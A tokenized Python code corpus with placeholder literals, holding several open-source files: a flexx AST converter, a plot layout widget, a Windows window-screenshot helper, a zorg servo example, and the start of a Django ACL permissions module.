'<STR_LIT>' , <EOL> class Yield ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class YieldFrom ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Global ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Nonlocal ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class ClassDef ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class NativeAstConverter : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , code ) : <EOL> self . _root = ast . parse ( code ) <EOL> self . _lines = code . splitlines ( ) <EOL> self . _stack = [ ] <EOL> def _add_comments ( self , container , lineno ) : <EOL> """<STR_LIT>""" <EOL> linenr1 = self . _comment_pointer <EOL> linenr2 = lineno <EOL> self . _comment_pointer = linenr2 + <NUM_LIT:1> <EOL> for i in range ( linenr1 , linenr2 ) : <EOL> line = self . _lines [ i - <NUM_LIT:1> ] <EOL> if line . lstrip ( ) . startswith ( '<STR_LIT:#>' ) : <EOL> before , _ , comment = line . partition ( '<STR_LIT:#>' ) <EOL> node = Comment ( comment ) <EOL> node . lineno = i <EOL> node . col_offset = len ( before ) <EOL> container . append ( node ) <EOL> def convert ( self , comments = False ) : <EOL> assert not self . _stack <EOL> self . _comment_pointer = <NUM_LIT:1> <EOL> result = self . _convert ( self . _root ) <EOL> while self . _stack : <EOL> container , native_nodes = self . _stack . pop ( <NUM_LIT:0> ) <EOL> for native_node in native_nodes : <EOL> node = self . _convert ( native_node ) <EOL> if comments : <EOL> self . _add_comments ( container , node . lineno ) <EOL> container . append ( node ) <EOL> return result <EOL> def _convert ( self , n ) : <EOL> if n is None : <EOL> return None <EOL> assert isinstance ( n , ast . AST ) <EOL> type = n . __class__ . __name__ <EOL> try : <EOL> converter = getattr ( self , '<STR_LIT>' + type ) <EOL> except AttributeError : <EOL> raise RuntimeError ( '<STR_LIT>' % type ) <EOL> val = converter ( n ) <EOL> assert isinstance ( val , Node ) <EOL> val . lineno = getattr ( n , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> val . col_offset = getattr ( n , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> return val <EOL> def _convert_Module ( self , n ) : <EOL> node = Module ( [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> return node <EOL> def _convert_Num ( self , n ) : <EOL> if pyversion < ( <NUM_LIT:3> , ) and str ( n . n ) . startswith ( '<STR_LIT:->' ) : <EOL> return UnaryOp ( Node . OPS . USub , Num ( - n . n ) ) <EOL> return Num ( n . n ) <EOL> def _convert_Str ( self , n ) : <EOL> if pyversion < ( <NUM_LIT:3> , ) and self . _lines [ n . lineno - <NUM_LIT:1> ] [ n . col_offset ] == '<STR_LIT:b>' : <EOL> return Bytes ( n . s ) <EOL> return Str ( n . s ) <EOL> def _convert_Bytes ( self , n ) : <EOL> return Bytes ( n . s ) <EOL> def _convert_List ( self , n ) : <EOL> c = self . _convert <EOL> return List ( [ c ( x ) for x in n . elts ] ) <EOL> def _convert_Tuple ( self , n ) : <EOL> c = self . _convert <EOL> return Tuple ( [ c ( x ) for x in n . elts ] ) <EOL> def _convert_Set ( self , n ) : <EOL> c = self . _convert <EOL> return Set ( [ c ( x ) for x in n . elts ] ) <EOL> def _convert_Dict ( self , n ) : <EOL> c = self . _convert <EOL> return Dict ( [ c ( x ) for x in n . keys ] , [ c ( x ) for x in n . values ] ) <EOL> def _convert_Ellipsis ( self , n ) : <EOL> if pyversion < ( <NUM_LIT:3> , ) : <EOL> return Index ( Ellipsis ( ) ) <EOL> return Ellipsis ( ) <EOL> def _convert_NameConstant ( self , n ) : <EOL> return NameConstant ( n . value ) <EOL> def _convert_Name ( self , n ) : <EOL> if pyversion < ( <NUM_LIT:3> , <NUM_LIT:4> ) : <EOL> M = { '<STR_LIT:None>' : None , '<STR_LIT:False>' : False , '<STR_LIT:True>' : True } <EOL> if n . id in M : <EOL> return NameConstant ( M [ n . id ] ) <EOL> if pyversion < ( <NUM_LIT:3> , ) and isinstance ( n . ctx , ast . Param ) : <EOL> return Arg ( n . id , None , None ) <EOL> return Name ( n . id ) <EOL> def _convert_Starred ( self , n ) : <EOL> return Starred ( self . _convert ( n . value ) ) <EOL> def _convert_Attribute ( self , n ) : <EOL> return Attribute ( self . _convert ( n . value ) , n . attr ) <EOL> def _convert_Subscript ( self , n ) : <EOL> return Subscript ( self . _convert ( n . value ) , self . _convert ( n . slice ) ) <EOL> def _convert_Index ( self , n ) : <EOL> return Index ( self . _convert ( n . value ) ) <EOL> def _convert_Slice ( self , n ) : <EOL> c = self . _convert <EOL> step = c ( n . step ) <EOL> if pyversion < ( <NUM_LIT:3> , ) and isinstance ( step , NameConstant ) and step . value is None : <EOL> if not self . _lines [ n . step . lineno - <NUM_LIT:1> ] [ n . step . col_offset : ] . startswith ( '<STR_LIT:None>' ) : <EOL> step = None <EOL> return Slice ( c ( n . lower ) , c ( n . upper ) , step ) <EOL> def _convert_ExtSlice ( self , n ) : <EOL> c = self . _convert <EOL> return ExtSlice ( [ c ( x ) for x in n . dims ] ) <EOL> def _convert_Expr ( self , n ) : <EOL> return Expr ( self . _convert ( n . value ) ) <EOL> def _convert_UnaryOp ( self , n ) : <EOL> op = n . op . __class__ . __name__ <EOL> return UnaryOp ( op , self . _convert ( n . operand ) ) <EOL> def _convert_BinOp ( self , n ) : <EOL> op = n . op . __class__ . __name__ <EOL> return BinOp ( op , self . _convert ( n . left ) , self . _convert ( n . right ) ) <EOL> def _convert_BoolOp ( self , n ) : <EOL> c = self . _convert <EOL> op = n . op . __class__ . __name__ <EOL> return BoolOp ( op , [ c ( x ) for x in n . values ] ) <EOL> def _convert_Compare ( self , n ) : <EOL> c = self . _convert <EOL> comps = [ c ( x ) for x in ( [ n . left ] + n . comparators ) ] <EOL> ops = [ op . __class__ . __name__ for op in n . ops ] <EOL> assert len ( ops ) == ( len ( comps ) - <NUM_LIT:1> ) <EOL> compares = [ ] <EOL> for i in range ( len ( ops ) ) : <EOL> co = Compare ( ops [ i ] , comps [ i ] , comps [ i + <NUM_LIT:1> ] ) <EOL> compares . append ( co ) <EOL> assert compares <EOL> if len ( compares ) == <NUM_LIT:1> : <EOL> return compares [ <NUM_LIT:0> ] <EOL> else : <EOL> return BoolOp ( Node . OPS . And , compares ) <EOL> def _convert_Call ( self , n ) : <EOL> c = self . _convert <EOL> arg_nodes = [ c ( a ) for a in n . args ] <EOL> kwarg_nodes = [ c ( a ) for a in n . keywords ] <EOL> if pyversion < ( <NUM_LIT:3> , <NUM_LIT:5> ) : <EOL> if n . starargs : <EOL> arg_nodes . append ( Starred ( c ( n . starargs ) ) ) <EOL> if n . kwargs : <EOL> kwarg_nodes . append ( Keyword ( None , c ( n . kwargs ) ) ) <EOL> return Call ( c ( n . func ) , arg_nodes , kwarg_nodes ) <EOL> def _convert_keyword ( self , n ) : <EOL> return Keyword ( n . arg , self . _convert ( n . value or None ) ) <EOL> def _convert_IfExp ( self , n ) : <EOL> c = self . _convert <EOL> return IfExp ( c ( n . test ) , c ( n . body ) , c ( n . orelse ) ) <EOL> def _convert_ListComp ( self , n ) : <EOL> c = self . _convert <EOL> return ListComp ( c ( n . elt ) , [ c ( x ) for x in n . generators ] ) <EOL> def _convert_SetComp ( self , n ) : <EOL> c = self . _convert <EOL> return SetComp ( c ( n . elt ) , [ c ( x ) for x in n . generators ] ) <EOL> def _convert_GeneratorExp ( self , n ) : <EOL> c = self . _convert <EOL> return GeneratorExp ( c ( n . elt ) , [ c ( x ) for x in n . generators ] ) <EOL> def _convert_DictComp ( self , n ) : <EOL> c = self . _convert <EOL> return DictComp ( c ( n . key ) , c ( n . value ) , [ c ( x ) for x in n . generators ] ) <EOL> def _convert_comprehension ( self , n ) : <EOL> c = self . _convert <EOL> return Comprehension ( c ( n . target ) , c ( n . iter ) , [ c ( x ) for x in n . ifs ] ) <EOL> def _convert_Assign ( self , n ) : <EOL> c = self . _convert <EOL> return Assign ( [ c ( x ) for x in n . targets ] , c ( n . value ) ) <EOL> def _convert_AugAssign ( self , n ) : <EOL> op = n . op . __class__ . __name__ <EOL> return AugAssign ( self . _convert ( n . target ) , op , self . _convert ( n . value ) ) <EOL> def _convert_Print ( self , n ) : <EOL> c = self . _convert <EOL> if len ( n . values ) == <NUM_LIT:1> and isinstance ( n . values [ <NUM_LIT:0> ] , ast . Tuple ) : <EOL> arg_nodes = [ c ( x ) for x in n . values [ <NUM_LIT:0> ] . elts ] <EOL> else : <EOL> arg_nodes = [ c ( x ) for x in n . values ] <EOL> kwarg_nodes = [ ] <EOL> if n . dest is not None : <EOL> kwarg_nodes . append ( Keyword ( '<STR_LIT>' , c ( n . dest ) ) ) <EOL> if not n . nl : <EOL> kwarg_nodes . append ( Keyword ( '<STR_LIT:end>' , Str ( '<STR_LIT>' ) ) ) <EOL> return Expr ( Call ( Name ( '<STR_LIT>' ) , arg_nodes , kwarg_nodes ) ) <EOL> def _convert_Exec ( self , n ) : <EOL> c = self . _convert <EOL> arg_nodes = [ c ( n . body ) ] <EOL> arg_nodes . append ( c ( n . globals ) or NameConstant ( None ) ) <EOL> arg_nodes . append ( c ( n . locals ) or NameConstant ( None ) ) <EOL> return Expr ( Call ( Name ( '<STR_LIT>' ) , arg_nodes , [ ] ) ) <EOL> def _convert_Repr ( self , n ) : <EOL> c = self . _convert <EOL> return Call ( Name ( '<STR_LIT>' ) , [ c ( n . value ) ] , [ ] ) <EOL> def _convert_Raise ( self , n ) : <EOL> if pyversion < ( <NUM_LIT:3> , ) : <EOL> if n . inst or n . tback : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> return Raise ( self . _convert ( n . type ) , None ) <EOL> return Raise ( self . _convert ( n . exc ) , self . _convert ( n . cause ) ) <EOL> def _convert_Assert ( self , n ) : <EOL> return Assert ( self . _convert ( n . test ) , self . _convert ( n . msg ) ) <EOL> def _convert_Delete ( self , n ) : <EOL> c = self . _convert <EOL> return Delete ( [ c ( x ) for x in n . targets ] ) <EOL> def _convert_Pass ( self , n ) : <EOL> return Pass ( ) <EOL> def _convert_Import ( self , n ) : <EOL> return Import ( None , [ ( x . name , x . asname ) for x in n . names ] , <NUM_LIT:0> ) <EOL> def _convert_ImportFrom ( self , n ) : <EOL> names = [ ( x . name , x . asname ) for x in n . names ] <EOL> return Import ( n . module , names , n . level ) <EOL> def _convert_If ( self , n ) : <EOL> c = self . _convert <EOL> node = If ( c ( n . test ) , [ ] , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> self . _stack . append ( ( node . else_nodes , n . orelse ) ) <EOL> return node <EOL> def _convert_For ( self , n ) : <EOL> c = self . _convert <EOL> node = For ( c ( n . target ) , c ( n . iter ) , [ ] , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> self . _stack . append ( ( node . else_nodes , n . orelse ) ) <EOL> return node <EOL> def _convert_While ( self , n ) : <EOL> c = self . _convert <EOL> node = While ( c ( n . test ) , [ ] , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> self . _stack . append ( ( node . else_nodes , n . orelse ) ) <EOL> return node <EOL> def _convert_Break ( self , n ) : <EOL> return Break ( ) <EOL> def _convert_Continue ( self , n ) : <EOL> return Continue ( ) <EOL> def _convert_Try ( self , n ) : <EOL> c = self . _convert <EOL> node = Try ( [ ] , [ c ( x ) for x in n . handlers ] , [ ] , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> self . _stack . append ( ( node . else_nodes , n . orelse ) ) <EOL> self . _stack . append ( ( node . finally_nodes , n . finalbody ) ) <EOL> return node <EOL> def _convert_TryFinally ( self , n ) : <EOL> c = self . _convert <EOL> if ( len ( n . body ) == <NUM_LIT:1> ) and n . body [ <NUM_LIT:0> ] . __class__ . __name__ == '<STR_LIT>' : <EOL> n2 = n . body [ <NUM_LIT:0> ] <EOL> node = Try ( [ ] , [ c ( x ) for x in n2 . handlers ] , [ ] , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n2 . body ) ) <EOL> self . _stack . append ( ( node . else_nodes , n2 . orelse ) ) <EOL> self . _stack . append ( ( node . finally_nodes , n . finalbody ) ) <EOL> else : <EOL> node = Try ( [ ] , [ ] , [ ] , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> self . _stack . append ( ( node . finally_nodes , n . finalbody ) ) <EOL> return node <EOL> def _convert_TryExcept ( self , n ) : <EOL> c = self . _convert <EOL> node = Try ( [ ] , [ c ( x ) for x in n . handlers ] , [ ] , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> self . _stack . append ( ( node . else_nodes , n . orelse ) ) <EOL> return node <EOL> def _convert_ExceptHandler ( self , n ) : <EOL> c = self . _convert <EOL> name = n . name . id if isinstance ( n . name , ast . Name ) else n . name <EOL> node = ExceptHandler ( c ( n . type ) , name , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> return node <EOL> def _convert_With ( self , n ) : <EOL> c = self . _convert <EOL> if hasattr ( n , '<STR_LIT>' ) : <EOL> node = With ( [ c ( x ) for x in n . items ] , [ ] ) <EOL> else : <EOL> items = [ WithItem ( c ( n . context_expr ) , c ( n . optional_vars ) ) ] <EOL> while ( len ( n . body ) == <NUM_LIT:1> ) and isinstance ( n . body [ <NUM_LIT:0> ] , n . __class__ ) : <EOL> n = n . body [ <NUM_LIT:0> ] <EOL> items . append ( WithItem ( c ( n . context_expr ) , c ( n . optional_vars ) ) ) <EOL> node = With ( items , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> return node <EOL> def _convert_withitem ( self , n ) : <EOL> return WithItem ( self . _convert ( n . context_expr ) , self . _convert ( n . optional_vars ) ) <EOL> def _convert_FunctionDef ( self , n ) : <EOL> c = self . _convert <EOL> args = n . args <EOL> arg_nodes = [ c ( x ) for x in args . args ] <EOL> for i , default in enumerate ( reversed ( args . defaults ) ) : <EOL> arg_node = arg_nodes [ - <NUM_LIT:1> - i ] <EOL> if isinstance ( arg_node , Tuple ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> arg_node . value_node = c ( default ) <EOL> if pyversion < ( <NUM_LIT:3> , ) : <EOL> kwarg_nodes = [ ] <EOL> else : <EOL> kwarg_nodes = [ c ( x ) for x in args . kwonlyargs ] <EOL> for i , default in enumerate ( reversed ( args . kw_defaults ) ) : <EOL> kwarg_nodes [ - <NUM_LIT:1> - i ] . value_node = c ( default ) <EOL> if pyversion < ( <NUM_LIT:3> , ) : <EOL> args_node = Arg ( args . vararg , None , None ) if args . vararg else None <EOL> kwargs_node = Arg ( args . kwarg , None , None ) if args . kwarg else None <EOL> elif pyversion < ( <NUM_LIT:3> , <NUM_LIT:4> ) : <EOL> args_node = kwargs_node = None <EOL> if args . vararg : <EOL> args_node = Arg ( args . vararg , None , c ( args . varargannotation ) ) <EOL> if args . kwarg : <EOL> kwargs_node = Arg ( args . kwarg , None , c ( args . kwargannotation ) ) <EOL> else : <EOL> args_node = c ( args . vararg ) <EOL> kwargs_node = c ( args . kwarg ) <EOL> returns = None if pyversion < ( <NUM_LIT:3> , ) else c ( n . returns ) <EOL> node = FunctionDef ( n . name , [ c ( x ) for x in n . decorator_list ] , returns , <EOL> arg_nodes , kwarg_nodes , args_node , kwargs_node , <EOL> [ ] ) <EOL> if docheck : <EOL> assert isinstance ( node . args_node , ( NoneType , Arg ) ) <EOL> assert isinstance ( node . kwargs_node , ( NoneType , Arg ) ) <EOL> for x in node . arg_nodes + node . kwarg_nodes : <EOL> assert isinstance ( x , Arg ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> return node <EOL> def _convert_Lambda ( self , n ) : <EOL> c = self . _convert <EOL> args = n . args <EOL> arg_nodes = [ c ( x ) for x in args . args ] <EOL> for i , default in enumerate ( reversed ( args . defaults ) ) : <EOL> arg_nodes [ - <NUM_LIT:1> - i ] . value_node = c ( default ) <EOL> if pyversion < ( <NUM_LIT:3> , ) : <EOL> kwarg_nodes = [ ] <EOL> else : <EOL> kwarg_nodes = [ c ( x ) for x in args . kwonlyargs ] <EOL> for i , default in enumerate ( reversed ( args . kw_defaults ) ) : <EOL> kwarg_nodes [ - <NUM_LIT:1> - i ] . value_node = c ( default ) <EOL> return Lambda ( arg_nodes , kwarg_nodes , <EOL> c ( args . vararg ) , c ( args . kwarg ) , c ( n . body ) ) <EOL> def _convert_arg ( self , n ) : <EOL> return Arg ( n . arg or None , None , self . _convert ( n . annotation ) ) <EOL> def _convert_Return ( self , n ) : <EOL> return Return ( self . _convert ( n . value ) ) <EOL> def _convert_Yield ( self , n ) : <EOL> return Yield ( self . _convert ( n . value ) ) <EOL> def _convert_YieldFrom ( self , n ) : <EOL> return YieldFrom ( self . _convert ( n . value ) ) <EOL> def _convert_Global ( self , n ) : <EOL> return Global ( n . names ) <EOL> def _convert_Nonlocal ( self , n ) : <EOL> return Nonlocal ( n . names ) <EOL> def _convert_ClassDef ( self , n ) : <EOL> c = self . _convert <EOL> arg_nodes = [ c ( a ) for a in n . bases ] <EOL> kwarg_nodes = [ ] if pyversion < ( <NUM_LIT:3> , ) else [ c ( a ) for a in n . keywords ] <EOL> if getattr ( n , '<STR_LIT>' , None ) : <EOL> arg_nodes . append ( Starred ( self . _convert ( n . starargs ) ) ) <EOL> if getattr ( n , '<STR_LIT>' , None ) : <EOL> kwarg_nodes . append ( Keyword ( None , self . _convert ( n . kwargs ) ) ) <EOL> node = ClassDef ( n . name , [ c ( a ) for a in n . decorator_list ] , <EOL> arg_nodes , kwarg_nodes , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> return node </s>
<s> """<STR_LIT>""" <EOL> from . import Widget <EOL> from . import Layout , VBox , HBox , GroupWidget , PlotWidget <EOL> class PlotLayout ( Layout ) : <EOL> """<STR_LIT>""" <EOL> def init ( self ) : <EOL> self . _box = HBox ( parent = self ) <EOL> with self . _box : <EOL> self . _left = VBox ( flex = <NUM_LIT:0> ) <EOL> with VBox ( flex = <NUM_LIT:0> ) : <EOL> self . _plot = PlotWidget ( flex = <NUM_LIT:0> , <EOL> style = '<STR_LIT>' ) <EOL> Widget ( flex = <NUM_LIT:1> ) <EOL> Widget ( flex = <NUM_LIT:1> ) <EOL> Widget ( flex = <NUM_LIT:1> , parent = self . _left ) <EOL> def add_tools ( self , name , * args ) : <EOL> """<STR_LIT>""" <EOL> stretch = self . _left . children ( ) [ - <NUM_LIT:1> ] <EOL> stretch . parent ( None ) <EOL> panel = GroupWidget ( title = name , parent = self . _left , flex = <NUM_LIT:0> ) <EOL> vbox = VBox ( parent = panel ) <EOL> for widget in args : <EOL> widget . parent ( vbox ) <EOL> stretch . parent ( self . _left ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> if sys . platform . startswith ( '<STR_LIT>' ) : <EOL> import ctypes <EOL> from ctypes import windll <EOL> from ctypes . wintypes import ( BOOL , DOUBLE , DWORD , HBITMAP , HDC , HGDIOBJ , <EOL> HWND , INT , LPARAM , LONG , UINT , WORD ) <EOL> SRCCOPY = <NUM_LIT> <EOL> DIB_RGB_COLORS = BI_RGB = <NUM_LIT:0> <EOL> class RECT ( ctypes . Structure ) : <EOL> _fields_ = [ ( '<STR_LIT:left>' , ctypes . c_long ) , <EOL> ( '<STR_LIT>' , ctypes . c_long ) , <EOL> ( '<STR_LIT:right>' , ctypes . c_long ) , <EOL> ( '<STR_LIT>' , ctypes . c_long ) ] <EOL> class BITMAPINFOHEADER ( ctypes . Structure ) : <EOL> _fields_ = [ ( '<STR_LIT>' , DWORD ) , ( '<STR_LIT>' , LONG ) , ( '<STR_LIT>' , LONG ) , <EOL> ( '<STR_LIT>' , WORD ) , ( '<STR_LIT>' , WORD ) , <EOL> ( '<STR_LIT>' , DWORD ) , ( '<STR_LIT>' , DWORD ) , <EOL> ( '<STR_LIT>' , LONG ) , ( '<STR_LIT>' , LONG ) , <EOL> ( '<STR_LIT>' , DWORD ) , ( '<STR_LIT>' , DWORD ) ] <EOL> class BITMAPINFO ( ctypes . Structure ) : <EOL> _fields_ = [ ( '<STR_LIT>' , BITMAPINFOHEADER ) , ( '<STR_LIT>' , DWORD * <NUM_LIT:3> ) ] <EOL> GetClientRect = windll . user32 . GetClientRect <EOL> GetWindowRect = windll . user32 . GetWindowRect <EOL> PrintWindow = windll . user32 . PrintWindow <EOL> GetWindowThreadProcessId = windll . user32 . GetWindowThreadProcessId <EOL> IsWindowVisible = windll . user32 . IsWindowVisible <EOL> EnumWindows = windll . user32 . EnumWindows <EOL> EnumWindowsProc = ctypes . WINFUNCTYPE ( ctypes . c_bool , <EOL> ctypes . POINTER ( ctypes . c_int ) , <EOL> ctypes . POINTER ( ctypes . c_int ) ) <EOL> GetWindowDC = windll . user32 . GetWindowDC <EOL> CreateCompatibleDC = windll . gdi32 . CreateCompatibleDC <EOL> CreateCompatibleBitmap = windll . gdi32 . CreateCompatibleBitmap <EOL> SelectObject = windll . gdi32 . SelectObject <EOL> BitBlt = windll . gdi32 . BitBlt <EOL> DeleteObject = windll . gdi32 . DeleteObject <EOL> GetDIBits = windll . gdi32 . GetDIBits <EOL> windll . user32 . GetWindowDC . argtypes = [ HWND ] <EOL> windll . gdi32 . CreateCompatibleDC . argtypes = [ HDC ] <EOL> windll . gdi32 . CreateCompatibleBitmap . argtypes = [ HDC , INT , INT ] <EOL> windll . gdi32 . SelectObject . argtypes = [ HDC , HGDIOBJ ] <EOL> windll . gdi32 . BitBlt . argtypes = [ HDC , INT , INT , INT , INT , HDC , INT , INT , DWORD ] <EOL> windll . gdi32 . DeleteObject . argtypes = [ HGDIOBJ ] <EOL> windll . gdi32 . GetDIBits . argtypes = [ HDC , HBITMAP , UINT , UINT , ctypes . c_void_p , <EOL> ctypes . POINTER ( BITMAPINFO ) , UINT ] <EOL> windll . user32 . GetWindowDC . restypes = HDC <EOL> windll . gdi32 . CreateCompatibleDC . restypes = HDC <EOL> windll . gdi32 . CreateCompatibleBitmap . restypes = HBITMAP <EOL> windll . gdi32 . SelectObject . restypes = HGDIOBJ <EOL> windll . gdi32 . BitBlt . restypes = BOOL <EOL> windll . gdi32 . GetDIBits . restypes = INT <EOL> windll . gdi32 . DeleteObject . restypes = BOOL <EOL> def win_for_pid ( pid ) : <EOL> """<STR_LIT>""" <EOL> handles = [ ] <EOL> def called_for_each_win ( hwnd , lParam ) : <EOL> if not IsWindowVisible ( hwnd ) : <EOL> return True <EOL> p_id = ctypes . c_int ( ) <EOL> if p_id . value == pid : <EOL> handles . append ( hwnd ) <EOL> return False <EOL> return True <EOL> EnumWindows ( EnumWindowsProc ( called_for_each_win ) , <NUM_LIT:0> ) <EOL> if handles : <EOL> return handles [ <NUM_LIT:0> ] <EOL> else : <EOL> return None <EOL> def screenshot ( pid , client = True ) : <EOL> """<STR_LIT>""" <EOL> hwnd = win_for_pid ( pid ) <EOL> rect = RECT ( ) <EOL> if client : <EOL> GetClientRect ( hwnd , ctypes . byref ( rect ) ) <EOL> else : <EOL> GetWindowRect ( hwnd , ctypes . byref ( rect ) ) <EOL> left , right , top , bottom = rect . left , rect . right , rect . top , rect . bottom <EOL> w , h = right - left , bottom - top <EOL> hwndDC = saveDC = bmp = None <EOL> try : <EOL> hwndDC = GetWindowDC ( hwnd ) <EOL> saveDC = CreateCompatibleDC ( hwndDC ) <EOL> bmp = CreateCompatibleBitmap ( hwndDC , w , h ) <EOL> SelectObject ( saveDC , bmp ) <EOL> if client : <EOL> PrintWindow ( hwnd , saveDC , <NUM_LIT:1> ) <EOL> else : <EOL> PrintWindow ( hwnd , saveDC , <NUM_LIT:0> ) <EOL> buffer_len = h * w * <NUM_LIT:4> <EOL> bmi = BITMAPINFO ( ) <EOL> bmi . bmiHeader . biSize = ctypes . sizeof ( BITMAPINFOHEADER ) <EOL> bmi . bmiHeader . biWidth = w <EOL> bmi . bmiHeader . biHeight = - h <EOL> bmi . bmiHeader . biPlanes = <NUM_LIT:1> <EOL> bmi . bmiHeader . biBitCount = <NUM_LIT:32> <EOL> bmi . bmiHeader . biCompression = BI_RGB <EOL> image = ctypes . create_string_buffer ( buffer_len ) <EOL> bits = windll . gdi32 . GetDIBits ( saveDC , bmp , <NUM_LIT:0> , h , image , bmi , DIB_RGB_COLORS ) <EOL> assert bits == h <EOL> image2 = ctypes . create_string_buffer ( h * w * <NUM_LIT:3> ) <EOL> image2 [ <NUM_LIT:0> : : <NUM_LIT:3> ] = image [ <NUM_LIT:2> : : <NUM_LIT:4> ] <EOL> image2 [ <NUM_LIT:1> : : <NUM_LIT:3> ] = image [ <NUM_LIT:1> : : <NUM_LIT:4> ] <EOL> image2 [ <NUM_LIT:2> : : <NUM_LIT:3> ] = image [ <NUM_LIT:0> : : <NUM_LIT:4> ] <EOL> return bytes ( image2 ) , ( w , h , <NUM_LIT:3> ) <EOL> finally : <EOL> if hwndDC : <EOL> DeleteObject ( hwndDC ) <EOL> if saveDC : <EOL> DeleteObject ( saveDC ) <EOL> if bmp : <EOL> DeleteObject ( bmp ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> im , shape = screenshot ( <NUM_LIT> , True ) <EOL> from flexx . util import icon <EOL> png = icon . write_png ( im , shape ) <EOL> open ( '<STR_LIT>' , '<STR_LIT:wb>' ) . write ( png ) </s>
<s> import time <EOL> import zorg <EOL> def move_servo ( my ) : <EOL> angle = <NUM_LIT:0> <EOL> while True : <EOL> my . servo . set_angle ( angle ) <EOL> angle += <NUM_LIT> <EOL> if angle > <NUM_LIT> : <EOL> angle = <NUM_LIT:0> <EOL> time . sleep ( <NUM_LIT:100> ) <EOL> robot = zorg . robot ( { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:5> , <EOL> } , <EOL> } , <EOL> "<STR_LIT>" : move_servo , <EOL> } ) <EOL> robot . start ( ) </s>
<s> import inspect <EOL> from django . core . cache import cache <EOL> from django . conf import settings <EOL> from django . contrib . auth . models import User , AnonymousUser <EOL> from django . db import models <EOL> from django . contrib . contenttypes import generic <EOL> from django . db . models . base import Model , ModelBase <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . shortcuts import render_to_response <EOL> from django . template import RequestContext <EOL> from django . http import Http404 , HttpResponseRedirect <EOL> from django . db . models import Q <EOL> from django . core . paginator import Paginator , InvalidPage <EOL> from django . template . loader import render_to_string <EOL> from zorna . account . models import UserGroup <EOL> from zorna import defines <EOL> ACL_USERS_PERMISSIONS_CACHE = u"<STR_LIT>" <EOL> ACL_GROUPS_PERMISSIONS_CACHE = u"<STR_LIT>" <EOL> ACL_MODEL_CACHE = u"<STR_LIT>" <EOL> def get_acl_for_model ( object ) : <EOL> """<STR_LIT>""" <EOL> if inspect . isclass ( object ) : <EOL> model = object <EOL> else : <EOL> model = object . __class__ <EOL> permclass = type ( '<STR_LIT>' , ( BaseACL , ) , { '<STR_LIT>' : model } ) <EOL> return permclass ( ) <EOL> def register_acl_for_model ( model , verbs ) : <EOL> content_type = ContentType . objects . get_for_model ( model ) <EOL> amc = cache . get ( ACL_MODEL_CACHE ) <EOL> if amc is None : <EOL> amc = { } <EOL> try : <EOL> return amc [ content_type . pk ] <EOL> except : <EOL> perms = [ ] <EOL> for k , v in verbs . iteritems ( ) : <EOL> try : <EOL> perm = ACLVerbPermission . objects . get ( <EOL> codename = k , <EOL> content_type = content_type ) <EOL> except ACLVerbPermission . DoesNotExist : <EOL> perm = ACLVerbPermission . objects . create ( <EOL> name = v , <EOL> content_type = content_type , <EOL> codename = k ) <EOL> perms . append ( perm ) <EOL> amc [ content_type . pk ] = perms <EOL> cache . set ( ACL_MODEL_CACHE , amc ) <EOL> return amc [ content_type . pk ] <EOL> def get_allowed_objects ( user , model , permission ) : <EOL> if type ( permission ) is list : <EOL> ao = set ( [ ] ) <EOL> for perm in permission : <EOL> ao = ao . union ( set ( ACLPermission . objects . get_acl_objects_by_model ( <EOL> user , model , perm ) ) ) <EOL> return list ( ao ) <EOL> else : <EOL> return ACLPermission . objects . get_acl_objects_by_model ( user , model , permission ) <EOL> def get_acl_by_object ( object , permission ) : <EOL> """<STR_LIT>""" <EOL> return ACLPermission . objects . get_acl_by_object ( object , permission ) <EOL> def get_acl_groups_by_object ( object , permission ) : <EOL> """<STR_LIT>""" <EOL> return ACLPermission . objects . get_acl_groups_by_object ( object , permission ) <EOL> def get_acl_users_by_object ( object , permission ) : <EOL> """<STR_LIT>""" <EOL> return ACLPermission . objects . get_acl_users_by_object ( object , permission ) <EOL> class ACLVerbPermission ( models . Model ) : <EOL> name = models . CharField ( _ ( '<STR_LIT:name>' ) , max_length = <NUM_LIT:255> ) <EOL> content_type = models . ForeignKey ( ContentType ) <EOL> codename = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT:100> ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> unique_together = ( ( 